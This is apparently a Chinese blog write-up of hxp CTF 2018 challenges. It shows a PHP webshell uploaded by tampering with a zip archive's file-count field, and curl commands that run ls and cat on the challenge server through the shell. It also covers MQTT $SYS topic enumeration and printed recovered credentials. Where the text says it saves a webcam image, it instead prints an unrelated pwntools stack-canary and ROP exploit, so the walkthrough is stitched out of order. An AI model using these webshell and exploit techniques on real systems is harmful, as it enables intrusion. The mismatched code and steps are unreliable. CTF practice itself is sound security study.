

Tianji's Blog.

hxp-ctf

Tianji's Blog.

hxp-ctf

Word count: 1,240 / Reading time: 7 min

 2018/12/10   Share

• 
• 
• 
• 
• 

Web

unpacker

<?php
if (isset($_FILES['zip']) && $_FILES['zip']['size'] < 10*1024 ){
    $d = 'files/' . bin2hex(random_bytes(32));
    mkdir($d) || die('mkdir');
    chdir($d) || die('chdir');

    $zip = new ZipArchive();
    if ($zip->open($_FILES['zip']['tmp_name']) === TRUE) {
        for ($i = 0; $i < $zip->numFiles; $i++) {
            if(preg_match('/^[a-z]+$/', $zip->getNameIndex($i)) !== 1){
                die(':/ security');
            }
        }

        exec('unzip ' . escapeshellarg($_FILES['zip']['tmp_name']));
        echo $d;
    }
}
else {
    highlight_file(__FILE__);
}

上传一个压缩包，首先判断压缩包内文件个数，判断文件名是否有特殊字符。文件个数可以绕过:

• 首先生成一个压缩包，里边包含两个文件，其中一个是webshell
• 修改压缩包中的文件个数字段

ht@TIANJI:/mnt/c/Users/HT/Desktop/ht-ctf/hxpctf$ touch aaa
ht@TIANJI:/mnt/c/Users/HT/Desktop/ht-ctf/hxpctf$ vim aaa
ht@TIANJI:/mnt/c/Users/HT/Desktop/ht-ctf/hxpctf$ vim bbb.php
ht@TIANJI:/mnt/c/Users/HT/Desktop/ht-ctf/hxpctf$ zip test.php aaa bbb.php
  adding: aaa (stored 0%)
  adding: bbb.php (deflated 20%)

修改文件个数:

上传：

ht@TIANJI:/mnt/c/Users/HT/Desktop/ht-ctf/hxpctf$ curl -F "zip=@test.zip" "http://195.201.136.29:8087/"
files/cbe25b80780eaad19c94bc1b7ea20ed8c4a449444fd19b98263f4a25e433bbd9
ht@TIANJI:/mnt/c/Users/HT/Desktop/ht-ctf/hxpctf$ curl "http://195.201.136.29:8087/files/cbe25b80780eaad19c94bc1b7ea20ed8c4a449444fd19b98263f4a25e433bbd9/bbb.php?cmd=ls%20/"
bin
boot
dev
etc
flag_IVSbATTqgejx9Hn2berSknRO.php
home
..................
ht@TIANJI:/mnt/c/Users/HT/Desktop/ht-ctf/hxpctf$ curl "http://195.201.136.29:8087/files/cbe25b80780eaad19c94bc1b7ea20ed8c4a449444fd19b98263f4a25e433bbd9/bbb.php?cmd=cat%20/flag_IVSbATTqgejx9Hn2berSknRO.php"
<?php
'hxp{please_ask_gynvael_for_more_details_on_zips_:>}';

time for h4x0rpsch0rr?

<script>
  var client = mqtt.connect('ws://' + location.hostname + ':60805')
  client.subscribe('hxp.io/temperature/Munich')

  client.on('message', function (topic, payload) {
    var temp = parseFloat(payload)
    var result = 'NO'

    /* secret formular, please no steal*/
    if (-273.15 <= temp && temp < Infinity) {
      result = 'YES'
    }
    document.getElementById('beer').innerText = result
  })
</script>

通过如上脚本，可以看到在60805端口，运行着一个MQTT服务，并通过websocket像网站提供数据。我们自己开启一个客户端连入该服务，并订阅该主题。首先使用通配符”#”，表示订阅任意一个topic。

sudo pip install paho-mqtt

#!/usr/bin/python
 
import sys
import paho.mqtt.client as mqtt
 
def on_message(mqttc, obj, msg):
    print(msg.topic+" "+str(msg.qos))
    print(msg.payload)
 
mqttc = mqtt.Client(transport='websockets')
mqttc.on_message = on_message
 
mqttc.connect("159.69.212.240", 60805, 60)
mqttc.subscribe("#", 0)
mqttc.loop_forever()

得到的数据如下,没什么用:

hxp.io/temperature/Munich 0
13.37
hxp.io/temperature/Munich 0
13.37
hxp.io/temperature/Munich 0
13.37

接下来订阅“$SYS/#”, 所有以”\$”开头的主题都是隐藏的主题，”#”无法捕获到。”\$SYS”是一个能够提供一些服务内部信息的默认主体。

qianfa@qianfa:~/Desktop/pwn/hxp$ python mqtt.py 
$SYS/broker/version 0
mosquitto version 1.4.10
$SYS/broker/timestamp 0
Wed, 17 Oct 2018 19:03:03 +0200
$SYS/broker/uptime 0
257730 seconds
$SYS/broker/clients/total 0
49
$SYS/broker/clients/inactive 0
49
$SYS/broker/clients/disconnected 0
49
$SYS/broker/clients/active 0
0
$SYS/broker/clients/connected 0
0
$SYS/broker/clients/expired 0
0
$SYS/broker/clients/maximum 0
277
$SYS/broker/messages/stored 0
39
$SYS/broker/messages/received 0
774292
$SYS/broker/messages/sent 0
0
$SYS/broker/subscriptions/count 0
46
$SYS/broker/retained messages/count 0
39
$SYS/broker/heap/current 0
98632
$SYS/broker/heap/maximum 0
12085456
$SYS/broker/publish/messages/dropped 0
20906
$SYS/broker/publish/messages/received 0
103793
$SYS/broker/publish/messages/sent 0
0
$SYS/broker/publish/bytes/received 0
2092496493
$SYS/broker/publish/bytes/sent 0
9498698153
$SYS/broker/bytes/received 0
2103228320
$SYS/broker/bytes/sent 0
0
$SYS/broker/load/messages/received/1min 0
86.99
$SYS/broker/load/messages/received/5min 0
91.77
$SYS/broker/load/messages/received/15min 0
91.24
$SYS/broker/load/publish/received/1min 0
23.01
$SYS/broker/load/publish/received/5min 0
22.98
$SYS/broker/load/publish/received/15min 0
22.99
$SYS/broker/load/publish/dropped/1min 0
0.06
$SYS/broker/load/publish/dropped/5min 0
0.27
$SYS/broker/load/publish/dropped/15min 0
0.82
$SYS/broker/load/bytes/received/1min 0
497417.70
$SYS/broker/load/bytes/received/5min 0
492349.99
$SYS/broker/load/bytes/received/15min 0
491242.62
$SYS/broker/load/connections/1min 0
11.86
$SYS/broker/load/connections/5min 0
12.03
$SYS/broker/load/connections/15min 0
12.09
$SYS/broker/log/M/subscribe 0
1544438578: 68ec4be6-7a5d-4f24-84cc-be15cc0b1962 0 $SYS/#
$SYS/broker/log/M/subscribe 0
1544438579: 9e0c1b96-b237-4fcb-88fd-010ef0ed0ee3 0 $internal/admin/webcam

我们可以看到,”mosquitto version 1.4.10”,版本比较古老，存在CVE漏洞。 还有一个有趣的主题”\$internal/admin/webcam”，访问之后得到如下结果，可以看出是一张图片。

qianfa@qianfa:~/Desktop/pwn/hxp$ python mqtt.py 
$internal/admin/webcam 0
����JFIF


����hExifMM

>

F
(

1N�
�
paint.net 4.0.21��C





修改脚本，保存该图片：

from pwn import *

context.log_level = "debug"
p = process("./canary")
p.recvuntil("> ")
p.send("a" * 0x29)
p.recvn(0x28)
canary = u32(p.recvn(4)) - 0x61
print hex(canary)
p.recvuntil("> ")

sys_addr = 0x16D90
sh_addr = 0x61eb0
r0_gadget = 0x00049d1c
r1_gadget = 0x0006f088

#p.send("a" * 0x28 + p32(canary) + "a" * 0xc + p32(r1_gadget) + p32(sh_addr) + p32(r0_gadget) + "A" * 4 + p32(sys_addr))
p.send("a" * 0x28 + p32(canary) + "a" * 0xc + p32(0x10518))

p.interactive()

得到账号密码:

iot_fag
I<3SecurID
ID: 看图片，每次都有变化

flag: Flag: hxp{Air gap your beers :| - Prost!}

PWN

poor canary

原文作者: Tianji

原文链接: https://www.tiandiwuji.top/posts/11772/

发表日期: December 10th 2018, 6:09:53 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  xmasctf
• Previous Post
  php调试分析

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. Web
2. 2. unpacker
3. 3. time for h4x0rpsch0rr?

PWN

1. 1. poor canary



• Archive
• Tag
• Cate

Total : 77

2099

• 01/01day-day-up

2019

• 04/18AtomicInteger代码阅读
• 03/06算法刷刷刷
• 02/24java-面试准备
• 01/15dubbo-problem
• 01/12Thinkphp5.0.*之RCE漏洞分析

2018

• 12/2835c3ctf
• 12/27java开发小记
• 12/21软件安装相关问题
• 12/16内存取证分析
• 12/15xmasctf
• 12/10hxp-ctf
• 12/05php调试分析
• 12/05php7.2内核调试环境搭建
• 12/04linux-优化实战笔记
• 12/02RealWorldFinal
• 12/01pwnable.tw练习
• 11/29bctf2018
• 11/28安全域划分的相关问题
• 11/25code-breaking
• 11/19lctf-2018
• 11/11hctf2018
• 11/04SROP-study
• 11/02tcache-study
• 10/23hitcon-复现
• 10/17hack-lu
• 10/01netty入门到精通-初识NIO
• 09/26php-项目结构
• 09/26jvm-深入拆解java虚拟机
• 09/22anheng
• 09/21pwnable.kr_刷刷刷
• 09/20dubbo项目结构
• 09/20zookeeper安装-启动
• 09/20dubbo-启动
• 09/18casw-2018
• 09/18渗透测试-vulnhub-acid
• 09/08noxctf-writeup
• 09/05lamp && lnmp以apt-get的方式安装
• 09/04websec.fr-writeup
• 09/02TokyoWesterns CTF
• 08/06how2heap-分析总结
• 08/060ctf2018-babyheap
• 08/03ctfzone-ctf
• 07/30real-world-ctf
• 07/30ISITDTU-CTF
• 07/23巅峰极客ctf
• 07/18php-命令执行
• 07/17RSA学习
• 07/17ssti
• 07/15php命令执行函数
• 06/30web安全备忘录
• 06/26googlectf2018
• 06/24linux常见文件的作用
• 06/21sctf2018
• 06/14python多线程和lock和Rlock
• 06/08linux格式化字符串漏洞
• 06/08pwn备忘录
• 06/08sqlmap使用
• 06/04linux安全备忘录
• 06/04LRE_PAYLOAD绕过open_basedir
• 05/29mysql忘记密码/修改密码
• 05/29docker使用手册
• 05/29linux使用相关
• 05/28suctf2018
• 05/22phpinfo解读
• 05/22rctf2018学习笔记
• 05/21bypassaslr_return2plt
• 05/08cbc翻转
• 05/07misc思路
• 04/24常用shell命令及相关工具（shell+python+tools）
• 04/24parse_url + curl
• 04/20ddctf2018
• 04/18PHP代码审计归纳
• 03/27xss
• 03/27url相对路径和绝对路径
• 03/26python3和python2 base64的问题
• 03/21sql注入大全

pwn ctf web安全 ctf_php_debug 置顶 工具手册 dubbo jvm linux 运维 mysql php python python安全 前端 zookeeper 渗透测试 安全体系建设



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

安全

